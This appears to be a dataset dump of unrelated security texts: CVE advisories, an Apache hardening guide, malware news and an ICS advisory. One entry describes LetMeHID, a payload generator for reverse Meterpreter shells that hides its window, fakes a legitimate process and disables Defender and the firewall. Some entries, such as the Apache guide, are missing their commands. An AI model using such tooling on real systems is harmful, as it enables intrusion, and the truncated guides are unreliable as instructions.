content
stringlengths 196
523k
|
|---|
How to Buy
This script is Copyright (C) 2013 Tenable Network Security, Inc.
The remote Scientific Linux host is missing one or more security
It was discovered that the IcedTea-Web plug-in incorrectly used the
same class loader instance for applets with the same value of the
codebase attribute, even when they originated from different domains.
A malicious applet could use this flaw to gain information about and
possibly manipulate applets from different domains currently running
in the browser. (CVE-2013-1926)
The IcedTea-Web plug-in did not properly check the format of the
downloaded Java Archive (JAR) files. This could cause the plug-in to
execute code hidden in a file in a different format, possibly allowing
attackers to execute code in the context of web sites that allow
uploads of specific file types, known as a GIFAR attack.
This erratum also upgrades IcedTea-Web to version 1.2.3.
Web browsers using the IcedTea-Web browser plug-in must be restarted
for this update to take effect.
See also :
Update the affected icedtea-web, icedtea-web-debuginfo and / or
Risk factor :
Medium / CVSS Base Score : 6.8
Family: Scientific Linux Local Security Checks
Nessus Plugin ID: 66017 ()
CVE ID: CVE-2013-1926CVE-2013-1927
Nessus Professional: Scan unlimited IPs, run compliance checks & moreNessus Cloud: The power of Nessus for teams – from the cloud
The cookie settings on this website are set to 'allow all cookies' to give you the very best website experience. If you continue without changing these settings, you consent to this - but if you want, you can opt out of all cookies by clicking below.
|
Web Server Security (Apache or HTTPD) Part 1
Securing apache web server is important to get a good reputation for the hosting service. After setting up the apache web server it is very important to get the security check and minimum necessary security configurations for both side benefits. Here we will discuss few of the important issues in this article. The important basic security topics of apache web server are given below.
- Configure apache, so that the version of the apache keeps hidden.
- How to disable directory listing in apache
- How to disable unnecessary modules for apache.
- Run server using separate group and user.
- Restrict access of directories using allow and deny.
- Install two security modules (mod_security & mod_evasive) to secure Apache web server.
- How to disable followsymlinks
- Disable server side includes and CGI execution.
- Limit request size.
- How to disable ETag.
- Secure server from XSS attack.
- Secure server from Click Jacking attack.
- Allow browsing only within the document root.
Configure Apache, so that the version of the Apache keeps hidden
So as our first requirement we need to configure the Apache server, so that a usual client can not find out the Apache version. For that we need to add two lines in /ect/httpd/conf/httpd.conf file. So open this file using vim.
Now add these two below lines to get our goal.
Now save and exit the file and restart apache server. To restart Apache web server we need to run the below commands.
#systemctl restart httpd.service
How to disable directory listing in Apache
Next point we need to make sure that how we can disable directory listing! To do so we need to work on the same previous file and we need to find out the following part from the configuration file.
Once this section is found we need to put three lines in between the above tags to disable directory listing. The following lines we need to put in between these tags.
Require all granted
Now the final outcome of this will be like below.
Require all granted
Now save the configuration file and restart the httpd service. To do so we have to run the restart command again.
How to disable unnecessary modules for apache
Next we have to disable unnecessary modules of apache web server. To do so we have to change few lines in /etc/httpd/conf.modules.d/00-base.conf file. So, run the below command on terminal.
Now we will see few links like below.
LoadModule info_module modules/mod_info.so
Once we get this file and the lines like this we should find few common modules and put “#” tag infront of those lines. These modules names are given below.
Once these lines are comment out then we should save the file and restart the httpd service again.
Run server using separate group and user
Usually a new server is managed by the super user or by root. But as we all know the primary user for any server is the root. So any attacker would consider the root as the primary user for the web server. So we should change the user and the group of the server to make a server a little secure. For that we need to follow the below procedure.
First create a group using the following command.
Now create a user for web server using the following command.
#adduser -d /var/www/ -g webtest -s /bin/nologin webtest
Once the above user and groups are created, now we have to put these in configuration file. So let’s open and edit the configuration file. So open /etc/httpd/conf/httpd.conf file and find the user and group section. Than edit those two lines.
User webtestGroup webtest Now save the file and restart httpd service.
|
The application uses a cache to maintain a pool of objects, threads, connections, pages, or passwords to minimize the time it takes to access them or the resources to which they connect. If implemented improperly, these caches can allow access to unauthorized information or cause a denial of service vulnerability.
cwe_Nature: ChildOf cwe_CWE_ID: 200 cwe_View_ID: 1000 cwe_Ordinal: Primary
cwe_Nature: ChildOf cwe_CWE_ID: 200 cwe_View_ID: 699 cwe_Ordinal: Primary
|Confidentiality||Read Application Data|
Protect information stored in cache.
Do not store unnecessarily sensitive information in the cache.
Consider using encryption in the cache.
|
Cybersecurity experts mention that pspy is a command-line tool designed to spy on processes without the need for root permissions. By using this tool, researchers are allowed to view commands executed by other users, jobs, and other activities as they run. This is critical for listing Linux systems in CTF. It is also useful to demonstrate to system administrators why passing secrets as arguments on the command line is a bad idea.
The tool collects information from procfs scans. Researchers located in selected parts of the file system activate these scans to detect short-lived processes.
It is worth mentioning that there are tools to list all processes executed on Linux systems, including processes that have already been completed. For example, it is forkstat, used to receive kernel notifications about process-related events, such as fork and exec.
Although these tools require root privileges, that should not give users a misunderstood sense of security. Nothing prevents you from spying on processes running on a Linux system, and it is possible to access large amounts of information in procfs while a process is running. However, there is a drawback, as researchers must catch short-lived processes in very short time lapses. Scan the /proc directory for new PIDs in an infinite loop completes the hack, but consumes huge computing resources.
A less obvious method is to use the following: Processes tend to access files such as libraries in /usr, temporary files in /tmp, log files in /var, and more. Using the inotify API, the researcher can receive notifications whenever these files are created, modified, or deleted. High privileges are not required for this API, as it is required for many routine applications, such as text editors. Therefore, even though non-root users cannot monitor processes directly, they can monitor the effects of processes on the file system.
Administrators can use file system events as a trigger to scan/process, hoping to do so fast enough to detect the process. This is possible using pspy; although there is no guarantee that administrators will not lose any process, the chances of success are high enough to try.
He is a cyber security and malware researcher. He studied Computer Science at Miami and started working as a cyber security analyst in 2008. He is actively working as an cyber security investigator. He also worked for security companies like Cisco. His everyday job includes researching about new cyber security incidents. Also he has deep level of knowledge in enterprise security implementation.
|
Improper Input Validation
Bitcoin Core before 0.14 allows an attacker to create an ostensibly valid SPV proof for a payment to a victim who uses an SPV wallet, even if that payment did not actually occur. Completing the attack would cost more than a million dollars, and is relevant mainly only in situations where an autonomous system relies solely on an SPV proof for transactions of a greater dollar amount.
CWE-20 - Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.
|
The Duqu 2.0 Targeted Attacks
Virus Type: Malware / Espionage Too
What is Duqu 2.0?
Duqu 2.0 is a highly sophisticated malware platform exploiting up to three zero-day vulnerabilities with infections linked to the P5+1 events and venues for high level meetings between world leaders.
The attacks included some unique and earlier unseen features such as the code existing only in operative memory. It almost didn’t leave traces.
The philosophy and way of thinking of the “Duqu 2.0” group is a generation ahead of anything seen in the advanced persistent threats world.
Who are the victims of Duqu 2.0?
Duqu 2.0 has been used to attack a complex range of targets at the highest levels with similarly varied geo-political interests. Victims have been found in Western countries, as well as in countries in the Middle East and Asia.
How do I know if I'm infected or not?
The list of indicators of compromise is available on Securelist.com
How can I protect myself against the Duqu 2.0 campaign?
Procedures for protection from Duqu 2.0 have been added to the company’s products. Kaspersky Lab’s products detect this threat as HEUR:Trojan.Win32.Duqu2.gen.
More details on the Duqu 2.0 malware and Indicators of Compromise can be found in the technical report.
General guidance on mitigating APTs is available in the article “How to mitigate 85% of all targeted attacks using 4 simple strategies ”.
|
Permissions, Privileges, and Access Controls
The mozIJSSubScriptLoader.LoadScript function in Mozilla Firefox before 18.104.22.168, Thunderbird 22.214.171.124 and earlier, and SeaMonkey before 1.1.10 does not apply XPCNativeWrappers to scripts loaded from (1) file: URIs, (2) data: URIs, or (3) certain non-canonical chrome: URIs, which allows remote attackers to execute arbitrary code via vectors involving third-party add-ons.
CWE-264 - Permissions Privileges and Access Controls
CWE 264 (permissions, privileges, and access controls) is not a weakness in and of itself, rather it is a category of weaknesses related to the management of permissions, privileges, and other security features used to perform access control. If not addressed, the weaknesses in this category allow attackers to gain privileges for an unintended sphere of control, access sensitive information, and execute arbitrary commands.
|
1. EXECUTIVE SUMMARY
- CVSS v3 8.8
- ATTENTION: Low skill level to exploit
- Vendor: ABB
- Equipment: PB610 Panel Builder 600
- Vulnerabilities: Use of Hard-coded Credentials, Improper Authentication, Relative Path Traversal, Improper Input Validation, Stack-based Buffer Overflow
2. RISK EVALUATION
An attacker who successfully exploits these vulnerabilities could prevent legitimate access to an affected system node, remotely cause an affected system node to stop, take control of an affected system node, or insert and run arbitrary code in an affected system node.
3. TECHNICAL DETAILS
3.1 AFFECTED PRODUCTS
The following versions of PB610 Panel Builder 600, an engineering tool for designing HMI applications and the runtime for control panels, which are used for the operation of automation systems, are affected:
- PB610 Panel Builder 600, order code: 1SAP500900R0101, Versions 1.91 … 184.108.40.2067 and prior.
3.2 VULNERABILITY OVERVIEW
The ABB CP635 HMI component implements hidden administrative accounts used during the provisioning phase of the HMI interface. These credentials allow the provisioning tool “Panel Builder 600” to flash a new interface and Tags (MODBUS coils) mapping to the HMI. These credentials are used over both HTTP(S) and FTP. There is no option to disable or change these undocumented credentials.
The IDAL HTTP server CGI interface contains a URL, which allows an unauthenticated attacker to bypass authentication and gain access to privileged functions.
The IDAL FTP server fails to ensure directory change requests do not change to locations outside of the root FTP directory. An authenticated attacker can simply traverse outside the server root directory by changing the directory.
The IDAL HTTP server is vulnerable to memory corruption through insecure use of user supplied format strings. An attacker can abuse this functionality to bypass authentication or execute code on the server.
The IDAL FTP server is vulnerable to memory corruption through insecure use of user supplied format strings. An attacker can abuse this functionality to bypass authentication or execute code on the server.
The IDAL HTTP server is vulnerable to a stack-based buffer overflow when a large host header is sent in a HTTP request. The host header value overflows a buffer and can overwrite the Structured Exception Handler (SEH) address with a large chunk of data.
The IDAL FTP server is vulnerable to a buffer overflow when a large string is sent by an authenticated attacker. This overflow is handled, but terminates the process.
- CRITICAL INFRASTRUCTURE SECTORS: Chemical, Critical Manufacturing, Dams, Energy, Food and Agriculture, Water and Wastewater
- COUNTRIES/AREAS DEPLOYED: Worldwide
- COMPANY HEADQUARTERS LOCATION: Switzerland
Xen1thLabs, a Darkmatter Company, United Arab Emirates, and Abu Dhabi reported these vulnerabilities to ABB.
The problems are corrected in the following product versions:
ABB recommends users apply the update of the PB610 applications on CP600 control panels at the earliest convenience.
If an update of the devices is not possible. ABB recommends users restrict network access to the devices to only trusted parties/devices.
To prevent an unauthorized login via a remote client, leave the “Force Remote Login” option of the security settings checked (default setting). In addition, set new users and passwords in the user’s settings for remote clients to “use different user and password.”
ABB’s recommended security practices and firewall configurations can help protect a process control network from attacks that originate from outside the network. Such practices include :
- Restrict physical access to process control systems to authorized personnel,
- Do not have direct connections to the Internet,
- Separate from other networks by means of a firewall system with a minimal number of exposed ports,
- Process control systems should not be used for Internet surfing, instant messaging, or receiving e-mails.
- Portable computers and removable storage media should be carefully scanned for viruses before they are connected to a control system.
More information on ABB’s recommended practices can be found in the following document:
For additional information and support please contact the local ABB service organization. For contact information, see: https://new.abb.com/contact-centers.
Information about ABB’s cybersecurity program and capabilities can be found at: http://www.abb.com/cybersecurity.
For more information see ABB’s security advisory 3ADR010377.
NCCIC recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:
- When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.
NCCIC reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
NCCIC also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
Additional mitigation guidance and recommended practices are publicly available on the ICS-CERT website in the Technical Information Paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing any suspected malicious activity should follow their established internal procedures and report their findings to NCCIC for tracking and correlation against other incidents.
No known public exploits specifically target these vulnerabilities. If a control panel with a PB610 HMI application is connected to a network, an attacker who has network access to an affected system node could exploit these vulnerabilities. If the control panel is not connected to a network, an attacker would need to have physical access to an affected system node to exploit these vulnerabilities.
|
Gootkit is one of the malware families continually being closely tracked by F5 researchers. Our past coverage includes Gootkit activity during its first campaign where it leveraged anti forensics techniques including VM tricks and other anti-research traps done by Gootkit in Tackling Gootkit traps.
The latest Italian-centric Gootkit campaign does not have an exceptional target list. Most of the listed countries were already targeted most heavily for external injection. The industries targeted are mostly banking organizations and some email servers. We speculate this is probably to update its spam lists for possible future campaigns. As referenced in a previous article about Danabot campaign activity in November 2018, both malware variants have started to add email provider targets as default targets.
An additional section of the malware contained a redirection capability, which the malware used to target additional service providers, including antivirus (AV) companies and email providers. Gootkit also targeted specific parts of bank site URLs in order to disrupt regular communication with native banking components to aid in the fraud.
|
How North Korea Raises Money with Bitcoin
In 2016, the tech world started to notice that certain players, believed to be North Koreans, were utilizing advanced intrusion methods to carry out cyber-crime, which was targeted at the global financial system and major banks. This was a clear departure from North Korea’s previous tactics that used cyber espionage to carry out traditional hacking activity against other nations’ governments. However, since North Korea is considered to be a pariah state that is isolated from much of the world’s financial institution – in addition to being a country that has a government bureau dedicated to illegal economic activities – this new development was not very surprising. With the tight control that the country has on its intelligence and military organs, it is likely that these activities are conducted to fund the personal coffers of the elite in Pyongyang due to the sanctions that have placed severe financial restrictions on the Hermit Kingdom.
It is now possible that we could see a second wave of the campaign – a state-sponsored effort that seeks to steal virtual currencies, such as Bitcoin, in order to evade sanctions and obtain money to fund the North Korean regime. From May 2017, actors believed to be from North Korea have actively targeted at least three Cryptocurrency exchanges in South Korea, looking to steal funds. In these cases of ‘spearphishing,’ the personal email accounts of digital currency exchange employees were targeted, often with tax-themed lures as well as malware. The attacks have been linked to North Korean hackers, suspected to have been responsible for the intrusions of global banks back in 2016.
The Origin of North Korea’s Interest In Bitcoin
With the digital currency Bitcoin price gains and a period of meteoric growth, a plum job post began to circulate online: the position of Chief Financial Officer at a leading Cryptocurrency services company based in London. While the company itself is real, the job posting was dreamed up by hackers in North Korea, according to a report published by a cybersecurity firm known as Secureworks Inc. The company discovered a document containing details of the fake job post in November. The document was intended to be circulated via email to people involved in the Bitcoin industry. Whenever someone clicked on the document, they would receive a prompt that it had been created using a later version of Microsoft Word, adding that the user should ‘enable content’ and ‘enable editing.’ If the user did this, the file would install malicious code on their computer. Although most tech savvy people would know better than to carry out these instructions, such an attack can pay off if they manage to fool a few distracted users.
There are many things that the hackers could have been after, but the most likely target is believed to be corporate or personal stashes of cryptocurrencies, including Bitcoin. For a rogue regime like North Korea, the emergence of cryptocurrencies offers new possibilities for them to raise revenues, while getting around the stringent sanctions it has been placed under. The price of Bitcoin has risen from under $1,000 by the close of 2016 to over $17,000 today, with the additional benefit that large amounts of the currency can be moved anonymously across geographical borders. According to Joshua Chung of Secureworks’ counter-threat division, responsible for identifying new computer vulnerabilities and cyber attacks, Bitcoin provides the ‘perfect mechanism’ for North Korea to make money.
Secureworks tracked the document hack back to about June 2016, when its researchers started to see it being used against people involved in the energy industry. Some of the code used to create the Bitcoin job hack has been linked to the Lazarus Group, a North Korean outfit which was responsible for hacking into the computer systems of Sony Pictures in 2014, stole $81 million of Bangladesh’s central bank’s money in 2016 and released the WannaCry worm lose on the internet in May. WannaCry worked by locking up computers, demanding payment in Bitcoin, before the infected computers were freed.
The Perfect Way to Hide North Korea’s Money
The North Korean interest in Bitcoin dates back to around 2013, when the team at Secureworks noticed a lot of activity from the country’s internet addresses carrying out research on the Cryptocurrency and Bitcoin startups, on underground internet forums. Chung guesses that the North Koreans wanted to find out just how Bitcoin worked and how it could be converted into fiat currency. Although the country’s hackers usually cover their tracks through the use of proxy servers, which are intermediate systems that hide the origin of internet traffic, the proxies failed on this occasion, revealing an address that had been used in previous attacks.
The theft of funds from Bangladesh’s central bank proves that the North Koreans are capable of stealing Bitcoin if they gain access to a company’s computer systems. A senior researcher at Secureworks says that Pyongyang has repeatedly demonstrated its effectiveness at turning initial access from an intrusion, into an in-depth understanding of a network. North Korean hackers are also adept at figuring out business processes that can be used to achieve their aims.
South Korea, which often bears the brunt of the North’s cybercrime activities, also boasts one of the most vibrant Bitcoin markets in the world. North Korea’s hackers have already managed to compromise a number of Bitcoin exchanges there and successfully made away with funds in at least one case. FireEye Inc.’s Luke McNamara says that North Korea has some of the most entrepreneurial hackers in the world, and are not limited to just stealing Bitcoin. He believes that they may also be actively mining the currency, which means that they are involved in the computational processes that verify Blockchain transactions, with the system rewarding them with new bitcoins.
Most of this is theory developed from tiny clues, the standard method of cyberthreat research. Among the few people who have direct knowledge on Bitcoin operations in North Korea is Federico Tenga, who is co-founder of a firm that develops Bitcoin management systems for various organizations. Federico spent a week in Pyongyang in November, delivering lectures on Bitcoin technology to university students. They seemed especially impressed by photographs that he showed them of Bitcoin mining. He believes that the regime still has a long way to go if it plans to use Bitcoin technology to get around sanctions or use Cryptocurrency to any practical use.
The Bottom Line
With Bitcoin and other cryptocurrencies continuing to increase in value, many nation states are starting to take notice. In fact, an advisor to Russian President Putin recently announced that the country has plans to raise funds which will be used to increase its share of Bitcoin mining. In addition, Australia’s parliament has proposed that the country develops its own Cryptocurrency. For this reason, it comes as no surprise that this emerging asset class has become an area of interest for a regime that is, in many ways, run like a criminal enterprise.
|
Chinese APT Backdoor Bypasses Indonesian AntivirusTinyNote Creates a 'You Can't See It But It's There' Open Window
A Chinese espionage threat group is using a novel backdoor to bypass a popular Indonesian antivirus. Security researchers say targets include European embassies located in Southeast and East Asia.
Check Point said in research published Thursday that it had found a distribution server used by the threat actor protected by basic HTTP Authorization with a known password. Among the tools on the server - most already known, including HRSWord, made by Beijing-based Huorong Network Technology - researchers found a backdoor they dubbed TinyNote.
TinyNote is a "basic remote shell, limited in capabilities." It lets attackers set up persistence and execute commands from a command-and-control server. What's interesting about it, Check Point researchers said, is how it bypasses a security check by Smadav, an Indonesian antivirus tool popular in Southeast Asian countries including its home country and Malaysia.
The bypass is an indication of "the focused targeting of Camaro Dragon campaigns and their knowledge of their victims' environments and solutions."
As Check Point researchers explain it, each time a new process starts, Smadav checks to see if the process opens a visible window on the desktop. It treats processes with no windows as suspect and suggests that users may want to block them. TinyNote gets around that by opening a window - that is not visible to users. The backdoor opens a tool window that Microsoft Windows doesn't display in the taskbar or in the set of windows when a user presses Alt + Tab. TinyNote also sets the window width and height to zero and skips a call to the windows class function
RegisterClass by using a default class name.
"Ultimately, creating this window allows the threat actors to bypass the check, as the newly created window is technically visible, and continue the backdoor execution uninterrupted," the researchers wrote.
TinyNote is not the first instance of the threat actor exploiting Smadav for its ends. Swedish nonprofit Qurium in 2021 associated Mustang Panda with an attack - against Malaysian lawmakers who had been prevented by the military from taking seats in the Parliament - that used a Trojanized version of Smadav.
TinyNote file names Check Point found on the barely protected server and in the wild use terms connected with foreign affairs, such as "PDF_ Contacts List Of Invited Deplomatic Members." The naming conversion is similar to how Mustang Panda named another backdoor malware dubbed MQsTTang and discovered by Eset in March.
|
Security threats were once visible and easily identifiable, today’s cyber threats are invisible and anonymous. Where once warfare had clear rules and boundaries, modern cyber warfare is largely anarchic and without borders. As a result, governments and corporations alike are struggling to identify threats, let alone combat them effectively. This calls for an entirely new security discourse.
Cyberwarfare is Internet-based conflict involving politically motivated attacks on information and information systems. Cyberwarfare attacks can disable official websites and networks, disrupt or disable essential services, steal or alter classified data, and cripple financial systems Cyber warfare has been defined as “actions by a nation-state to penetrate another nation’s computers or networks for the purposes of causing damage or disruption”, but other definitions also include non-state actors, such as terrorist groups, companies, political or ideological extremist groups, hacktivists, and transnational criminal organization
Examples of Cyberwarfare-
• In 1998, the United States hacked into Serbia’s air defence system to compromise air traffic control and facilitate the bombing of Serbian targets.
• In 2007, in Estonia, a botnet of over a million computers brought down government, business and media websites across the country. The attack was suspected to have originated in Russia, motivated by political tension between the two countries.
• Also in 2007, an unknown foreign party hacked into high tech and military agencies in the United States and downloaded terabytes of information.
• In 2009, a cyber spy network called “GhostNet” accessed confidential information belonging to both governmental and private organizations in over 100 countries around the world. GhostNet was reported to originate in China, although that country denied responsibility.
Espionage: Espionage is basically taking information that wasn’t meant for you. In the case of cyber warfare, you’re going to be stealing tactical and strategic information: information about troop movements, the strengths and weaknesses of weapon systems, the dispositions of various and anything else about sensitive (read: necessary to wage war) resources that might be important to know.
Sabotage: Also called “direct action,” this is when we take an active role and go out there and do something. In cyber warfare sabotage can be something as benign as dropping a government’s website to causing a nuclear meltdown at a nuclear plant. It’s a pretty broad phrase, but just remember it means “do something” whereas espionage here means “learn something.”
Hillary Clinton– “We need a military that is ready and agile so it can meet the full range of threats and operate on short notice on every domain, not just land, sea, air, and space, but also cyber space,”.
Barrack Obama – Look, we’re moving into a new era here where a number of countries have significant capacities,” Obama said. “But our goal is not to suddenly, in the cyber arena, duplicate a cycle of escalation that we saw when it comes to other arms races in the past, but rather to start instituting some norms so everybody’s acting responsibly.”
Cyber security is not simply a clear-cut technical issue. It is a strategic, political, and social phenomenon with all the accompanying messy nuances. Therefore, cyber reality must be examined with a scientific rigour by all disciplines, enabling an informed public debate. It is both morally essential and rationally effective for the responses to be formulated through a democratic process.
|
Hackers abuse Oracle WebLogic Server Vulnerability CVE-2019-2725 to deliver Monero Miner. The vulnerability is easily exploitable, any unauthenticated attacker with HTTP access to the server can attack without authentication.
Trend Micro observed a new cryptocurrency-mining activity involving the vulnerability and to hide the malicious code they used certificate files.
Malware exploits CVE-2019-2725 to execute a PowerShell command to download the malicious code obfuscated in the .cer file. The PowerShell scripts download the encoded certificate file from the attacker’s server.
To decode the certificate file CertUtil is used, CertUtil is a command-line program that is installed along with Certificate Services.
The extracted file update.ps1 is executed using PowerShell command, and the downloaded certificate is deleted using command.
“When we downloaded the certificate file, we noticed that it looked like a normal Privacy-Enhanced Mail (PEM) format certificate. However, upon decoding the base64 content, we found that, instead of the commonly used X.509 TLS file format, it comes in the form of the PS command,” reads Trend Micro report.
Last month another campaign leveraged the vulnerability to download Sodinokibi ransomware and to encrypt the customer’s systems.
It is recommended to patch the CVE-2019-2725 vulnerability; you can find the security alert published by Oracle and the Patch Availability here.
You can follow us on Linkedin, Twitter, Facebook for daily Cybersecurity updates also you can take the Best Cybersecurity courses online to keep your self-updated.
Splunk is one of the most used SIEM (Security Incident and Event Management) tools worldwide.…
California-based Ring LLC endangered its customers’ privacy by allowing any employee or contractor to see…
Gigabyte systems have been identified by the Eclypsium platform for exhibiting suspicious backdoor-like behavior. This…
The third Beta version of Security Onion 2.4 is made available by Security Onion Solutions.…
The Leak discloses Address, Vehicle Identification Number (VIN), Email address, Phone number, Name, and Vehicle…
Dark Pink has successfully targeted 13 organizations across 9 countries, highlighting the extent of their…
|
This event occurs when a user has escalated privilege to a higher privileged account.
Why this Event is Important
Mostly benign, but in some cases may indicate malicious activity—either an insider threat or an attacker employing a privilege escalation vulnerability.
After the initial compromise, a malicious actor typically needs to escalate privileges to move laterally in the network, execute malware, achieve persistence, etc. Escalating privilege usually indicates human intervention.
Identify the user and application to determine if the behavior is expected, for example, as part of a troubleshooting session. If the behavior is not expected, expand the time horizon and investigate pre and post-event user activity across the data center. Investigate further actions taken by the privileged account and look for indicators of persistence, such as new crontab entries, or the running of applications that require escalated privileges, such as interacting with sockets.
Determine if the privilege escalation was routine and benign. If it appears to be malicious, disable the user and take the necessary steps to restore any impacted hosts to a known, clean state.
|
Hi! Today I’m publishing a little tool I created some months ago. In these days I’m publishing a lot of things but obviously I’m not coding all day and night! 😀 As many of you, I’ve been stuck at home for almost two months and I’m using this time to review and publish all those projects that I did in the past, but that I never found the time to finish.
LetMeHID is a python tool that generates payload for the great [P4wnP1 A.L.O.A.](https://github.com/RoganDawes/P4wnP1_aloa), created by Marcus Mengs (MaMe82). The tool generates payloads can be executed on target Windows system in order to try to obtain a bind or reverse access using Metasploit Meterpreter.
The Meterpreter Stager that is executed by LetMeHID is letmein.ps1, a pure PowerShell Stager coded by my coworker Marco Ivaldi that is perfect for the purpose. The stager on his own had a very low detection rate but has been further compressed and modified to be more stealth. Bind and reverse shell payloads are in external files and can be easily replaced with ones with custom obfuscation (pay attention to the maximum number of characters that you can paste in a shell if you want to use the “direct” mode of operation).
As a bonus, this tool could be quite useful also if you are not interested in HID devices. During a penetration test if you have a command execution or a shell access, you can copy and paste commands generated by LetMeHID to easy obtain a bind/reverse Meterpreter shell! 😉
LetMeHID generates the following types of payloads:
- direct: the payload is typed directly by the keyboard (longer but does not requires anything to work)
- downloadAndExecute: the payload is downloaded from the attacker machine (proxy and proxy credentials supported) directly into the memory (without downloading to the file-system) and executed from memory (faster but require a HTTP connection from the target)
- executeFromSd: the payload is executed from the external memory or external CD-rom emulated from the Raspberry PI0 (faster but instlls an external memory or external CD-rom to target, that can be suspicious/detected…)
Some juicy features has been added to LetMeHID in order to increase the success of the attack or to fake a real process:
- Payloads support also PowerShell 2.0
- Payloads use “-windowstyle hidden” option of PowerShell that put the PowerShell window in background
- “fakeLegitProcess” option executes a custom command after the payload, in order to simulate a legit process like and AntiVirus update that spawns terminals. With this option, the default command opens the Windows Update page of the Control Panel (but can be changed)
- Admin mode tries to open a PowerShell terminal with administrative privileges (there is a delay of 5 seconds because the UAT popup can require more time to show up)
- “disableDefender” and “disableFirewall” options try to disable Windows Defender and Windows Firewall (admin mode only)
More information and obviously the tool could be found in the following GitHub repository:
|
According to researchers at Click Forensics, computers that are part of the so-called Bahama Botnet are infected with malware that sends them to counterfeit search pages instead of the real thing. They look authentic, and with the help of DNS poisoning routines, they even display google.com yahoo.com or bing.com in the address bar. Read the full story [The Register/Dan Goodin]
Google is working on a new system that enables the company to collect randomized information
A new SMTP header developed by Facebook and Yahoo confirms ownership of Yahoo email accounts.
Google is introducing an improved two-factor authentication system for Gmail and its other services that uses a tiny hardware token that will only work on legitimate Google sites.
|
Understanding Malware: Role of Social Networking
Malware attacks are a growing concern amongst enterprises. It not only results in downtime but also poses the threat of data theft. In the third of this four part series on malware attacks on enterprises, we explain the relationship between social networking and malware.
Relationship between social networking and malware
Social networking platforms and instant messaging services, along with peer-to-peer networks are the favorite vectors for disseminating different malware. Because of their wide popularity among computer users and the amount of personal information stored, social networking platforms have become the favorite hunting place for attackers.
Spamming is also a common practice among social networking service users. Although Twitter and Facebook have begun reinforcing their policies, unsolicited comments, advertisements, graffiti and other types of spam are still present. Another service, such as the professional network LinkedIn, has become the favorite playground for people and organizations offering miscellaneous services. Spammers attempt to join users’ professional networks and then bomb them with messages advertising their products or services. During the past six months, multiple variations of LinkedIn spam have been identified- a warning sign showing that the precarious state of the global economy pushes more and more providers into abusively marketing their services via social networks.
While spam and phishing sum up almost 80 percent of the e-threats related to social networks, worms exploiting large platforms have rapidly escalated. During the last six months of 2009, numerous families of worms have been pestering the most important social networks such as Twitter, MySpace and Facebook.
Initially spotted on August 2008, the Koobface worm has been one of the most active and destructive e-threats affecting social networking platforms. The cyber-criminal team behind the worm has released multiple variants of it in order to extend their reach with multiple social networking services. The worm has been initially designed for Facebook, but subsequent variants of Win32.Worm.Facebook.A also targeted MySpace and Twitter accounts.
The viral infections took most of the platforms by surprise and the damage inflicted to users was beyond imagination. The infection technique was simple yet efficient: the worm used compromised accounts to lure friends into clicking the infected links.
Other Facebook worms blend social engineering with highly-advanced URL manipulations resulting in a cross-site request forgery in order to submit their message every time the user clicks on an infected link. These specific Cross-Site-Request Forgery attacks (also known as XSRF) are based on iframes running third-party scripts to manipulate Facebook into behaving as if the account user had sent a wall post.
The attacks on social networks can cause productivity loss - slowed networks due to the bandwidth waste, reduced e-mail processing and storage capabilities, time spent to sort and discard the unwanted messages, resource consuming collateral damages, such as detection and removal of malware, etc.
This article has been written with inputs from Catalin Cosoi, Senior Antimalware Researcher, BitDefender.
- Facebook India MD Umang Bedi Resigns
- Twitter Names Sriram Krishnan As Senior Director Of Product
- How Mumbai Police Found Its Twitter Success Formula
- Poor Cybersecurity Hygiene Leads To Greater Risks: Study
- Twitter Hashtag@10: Why Brands Should Care
- Sundar Pichai, More Than Just Googled!
- Is 3-D Drawing Going To Kill Microsoft Paint?
- LinkedIn’s “Made in India” Lite App To Touch Over 60 Nations
- Infor Teams Up With LinkedIn To Empower CRM
- Most-Loved Tech CEOs And What Sets Them Apart
|
Malware authors have developed a new, and frighteningly effective, tactic that uses a feature built into all of the modern browsers to redirect users to malicious sites without their knowledge or action.
In a worrisome new twist, attackers have begun using proxy auto-config (PAC) files, which are designed to enable browsers to automatically select which proxy server to use to get a specific URL. It’s a useful technique for administrators interested in pushing their users through a particular proxy server on their way to the Web. But now, malware writers, particularly the creators of Brazilian banker Trojans, have latched onto PAC files as a way to push victims to phishing sites.
After being infected by a Trojan banker, if a user tries to access some
of the websites listed in the script, they will be redirected to a
phishing domain hosted at the malicious proxy server.
A lot of the Brazilian malware is using this trick nowadays. Not only
Internet Explorer users are affected, but also users of Firefox and
Chrome. The malware changes the file prefs.js, inserting the malicious
proxy in it:
The banker Trojans also take the extra step of inserting a malicious DLL into the startup routine so that the user can’t overwrite or remove the malicious script.
As users have gotten savvier about the existing tactics of phishers–fake emails, fraudulent Web sites–it’s become more difficult for the attackers to attract victims. Less obvious tactics like the use of malicious PAC files, are becoming more useful and effective.
|
There is a serious vulnerability in all supported versions of Windows that can allow an attacker who has control of some portion of a victim’s network traffic to steal users’ credentials for valuable services. The bug is related to the way that Windows and other software handles some HTTP requests, and researchers say it affects a wide range of applications, including iTunes and Adobe Flash.
The vulnerability, disclosed Monday by researchers at Cylance, is an extension of research done by Aaron Spangler nearly 20 years ago, and it’s known as Redirect to SMB. This weakness can enable an attacker to force victims to try to authenticate to an attacker-controlled server.
“Redirect to SMB is a way for attackers to steal valuable user credentials by hijacking communications with legitimate web servers via man-in-the-middle attacks, then sending them to malicious SMB (server message block) servers that force them to spit out the victim’s username, domain and hashed password,” a blog post by Brian Wallace from Cylance says.
“We uncovered Redirect to SMB while hunting for ways to abuse a chat client feature that provides image previews. When a URL to an image was received, the client attempted to show a preview of the image. Inspired by Aaron’s research some 18 years ago, we promptly sent another user a URL starting with file:// which pointed to a malicious SMB server. Surely enough, the chat client tried to load the image, and the Windows user at the other end attempted to authenticate with our SMB server.”
The Redirect to SMB flaw not only affects all of the current versions of Windows, but also Flash, some GitHub clients, some Oracle software and several security applications. Experts at the CERT/CC at Carnegie Mellon University warned that once an attacker is able to grab a victim’s credentials, those passwords can be cracked offline.
